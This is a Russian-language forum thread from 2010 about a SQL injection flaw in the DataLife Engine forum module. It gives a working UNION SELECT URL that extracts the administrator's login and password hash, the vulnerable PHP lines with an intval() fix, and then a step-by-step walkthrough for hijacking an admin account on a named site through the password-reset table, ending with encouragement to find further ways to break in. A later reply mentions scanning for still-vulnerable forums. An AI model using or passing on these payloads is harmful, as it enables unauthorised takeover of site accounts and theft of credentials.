ваш_сайт.ру/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_ group=1+limit+1-- ,

Если ВАш сайт уязвим, то в заголовке страницы будет отображен логин, и хеш пароля.
Уязвимость находится в скрипте engine/forum/sources/components/init.php в 446 строке!

if ($_REQUEST['category'])
{
$act = 'category';$cid =$_REQUEST['category'];

$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';

$fid = $_REQUEST['showforum'];

$t_act = '?f'.$fid;
}

if ($_REQUEST['showtopic'])
{
$act = 'topic';

$tid = $_REQUEST['showtopic'];

$t_act = '?t'.$tid;
}

Данный код необходимо заменить на:
if ($_REQUEST['category'])
{
$act = 'category';
$cid = intval($_REQUEST['category']);
$t_act = '?c'.$cid;
}
if ($_REQUEST['showforum'])
{
$act = 'forum';

$fid = intval($_REQUEST['showforum']);
$t_act = '?f'.$fid;
}
if ($_REQUEST['showtopic'])
{
$act = 'topic';
$tid = intval($_REQUEST['showtopic']);
$t_act = '?t'.$tid;
}

Добавлено (14.06.2010, 16:52)
---------------------------------------------
Как юзать грамотно сию багу
на 8dle.ru был установлен форум с уязвимостью sql inj
сначала идем на страницу 8dle.ru/?do=lostpassword
В поле вписываем имя админа
Далее в поле PREFIX_lostdb хранится хеш, который отсылается на почту, если открыть правильную ссылку с хешем получается такая же уязвимость как и на 8,2 с востановлением
И так мы снегерировали хешь, осталось только достать его из базы
_http://8dle.ru/?do=forum&showtopic=-1+union+select+1,2,CONCAT_WS (0x3a, lostname,lostid),4,5,6,7,8,9,10,11,12,13,14,15,16, 17 ,18,19,20,21,22,23+from+8dle_lostdb+where+lostname =ID+limit+1-- (Пробелы надо стереть).
указываете ID юзера которого ломаем
смотрим в исходнике полученной страницы <title>*** >> Darknull:md5
Копируем хешь и идем на ссылку
8dle.ru/?do=lostpassword&douser=ID&lostid=md5
вот и перед вами новый админский пароль
Если все сделано верно то вы гений
P.S. 8dle.ru уже залатали востановление пароля
так что ищите свои методы взлома

Добавлено (15.06.2010, 09:26)
---------------------------------------------
HALLBOY222, это или dle или домен сайта как с 8dle

AnabiOz, эффективно поверь, только уже вышли заплатки для дле форумов, и администраторы на порталах где они стоят уже обновили, только единицы с такими дырявыми форумами, сам недавно парсил и проверял